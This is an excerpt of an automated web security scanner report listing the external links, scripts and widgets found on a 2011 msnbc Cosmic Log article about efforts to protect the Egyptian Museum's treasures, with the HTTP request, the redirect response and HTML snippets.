The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578">here</A>
...[SNIP]...

22.59. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The page was loaded from a URL containing a query string:

http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001

The response contains the following links to other domains:

http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajpage.newsvine.com/
http://alan1380274.newsvine.com/
http://ally2998591.newsvine.com/
http://andiesandiegoca.newsvine.com/
http://angie1939907.newsvine.com/
http://blackshoesblacksocks.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://bspurloc.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://crappygovernment.newsvine.com/
http://cristofocristofo.newsvine.com/
http://crstardust.newsvine.com/
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://daveknightstable.newsvine.com/
http://davethedoubter.newsvine.com/
http://declan01.newsvine.com/
http://demmcc.newsvine.com/
http://doubleg2996677.newsvine.com/
http://earthsky.org/
http://english.aljazeera.net/news/middleeast/2011/01/2011129175926266521.html
http://eurekalert.org/
http://eviljason.newsvine.com/
http://freedman1-1.newsvine.com/
http://freemannogod.newsvine.com/
http://gregb2.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://henrybadgood.newsvine.com/
http://http/www.universetoday.com/
http://jimseida.newsvine.com/
http://john-roach.newsvine.com/
http://johntitor1.newsvine.com/
http://jtjsrch.newsvine.com/
http://kathy-1571680.newsvine.com/
http://kevpatok.newsvine.com/
http://krasnaludec.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247
http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5943271&rand=2029045702&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::
http://lola3.newsvine.com/
http://mar2892158.newsvine.com/
http://morphine-carnival.newsvine.com/
http://morriswise2276198.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://n2nh2000.newsvine.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://optomyst-1.newsvine.com/
http://piotrpanne.newsvine.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://sanescience.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://selmor101.newsvine.com/
http://spacefellowship.com/
http://toastymcgrath.newsvine.com/
http://today.msnbc.com/
http://trobertz.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://wtfever.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches
http://www.geekpress.com/
http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.unmannedspaceflight.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches?GT1=43001
Content-Type: text/html
Cache-Control: max-age=282
Date: Sat, 29 Jan 2011 23:45:48 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Egyptians ru
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5943271&rand=2029045702&do=msnbc.redacted&rf=http%3A%2F%2Fwww.redacted%2F&ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a>, or connect via <a href="http://www.facebook.com/cosmiclog" target="_blank">Facebook</a> or <a href="http://twitter.com/b0yle" target="_blank">Twitter</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/CosmicLog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
nment policies. "I am calling on the Egyptian army to head instantly to the Egyptian Museum. There is a fire right next to it in the party headquarters," he told the Al Arabiya television channel in a <a target="_blank" href="http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128">report relayed by Reuters</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<p itxtvisited="1">"I felt deeply sorry today when I came this morning to the Egyptian Museum and found that some had tried to raid the museum by force last night," <a href="http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129">Reuters quoted him as saying</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
said its TV crew was allowed into the museum and saw the vandalized mummies as well as at least 10 other artifacts that had been taken out of their glass display cases and damaged. The <a target="_blank" href="http://english.aljazeera.net/news/middleeast/2011/01/2011129175926266521.html">Al Jazeera news service </a>
...[SNIP]...
Hawass said the collection was still at risk, due to the proximity of the fire-ravaged party headquarters. "What scares me is that if this building is destroyed, it will fall over the museum," Hawass <a target="_blank" href="http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584">told reporters</a>
...[SNIP]...
</a> community by clicking the "like" button on <a target="_blank" href="http://www.facebook.com/cosmiclog">our Facebook page</a> or by following msnbc.com science editor Alan Boyle as <a href="http://twitter.com/b0yle">b0yle on Twitter</a>. To learn more about Alan Boyle's book about Pluto and the search for planets, check out the <a target="_blank" href="http://www.thecaseforpluto.com/">website for "The Case for Pluto."</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="cosmiclog" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches" data-Text="Egyptians rush to save Tut's riches">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://bspurloc.newsvine.com/">bspurloc</a>
...[SNIP]...
<div class="normal"><a href="http://crappygovernment.newsvine.com/">Ben-1671313</a>
...[SNIP]...
<div class="normal"><a href="http://cristofocristofo.newsvine.com/">Teacher Trish</a>
...[SNIP]...
<div class="normal"><a href="http://Kathy-1571680.newsvine.com/">Kathy-1571680</a>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="normal"><a href="http://freedman1-1.newsvine.com/">freedman1</a>
...[SNIP]...
<div class="normal"><a href="http://kevpatok.newsvine.com/">kpokeefe</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://johntitor1.newsvine.com/">John Titor</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://gregb2.newsvine.com/">GregB-2059108</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://CRStardust.newsvine.com/">Stardust-649419</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://AndieSanDiegoCA.newsvine.com/">Andie,San Diego, CA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://demmcc.newsvine.com/">dave-1186103</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://optomyst-1.newsvine.com/">Optomyst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaveKnightstable.newsvine.com/">Dave Knightstable</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://wtfever.newsvine.com/">ZillaKilla</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://angie1939907.newsvine.com/">angie-1939907</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://piotrpanne.newsvine.com/">cheetah-822547</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DoubleG2996677.newsvine.com/">DoubleG-2996677</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://morphine-carnival.newsvine.com/">~m~(O)~r~phine Carnival</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lola3.newsvine.com/">lola3</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://declan01.newsvine.com/">dman-353357</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BlackshoesBlacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trobertz.newsvine.com/">scales67</a>
...[SNIP]...
<p><a href="http://blackshoesblacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://AJPAGE.newsvine.com/">Page CN</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://selmor101.newsvine.com/">Roger-535160</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Alan1380274.newsvine.com/">Alan-1380274</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morriswise2276198.newsvine.com/">morris wise-2276198</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://henrybadgood.newsvine.com/">henrybadgood</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jtjsrch.newsvine.com/">John-334951</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ALLY2998591.newsvine.com/">ALLY-2998591</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://EvilJason.newsvine.com/">Evil Jason</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Freemannogod.newsvine.com/">Freemannogod</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
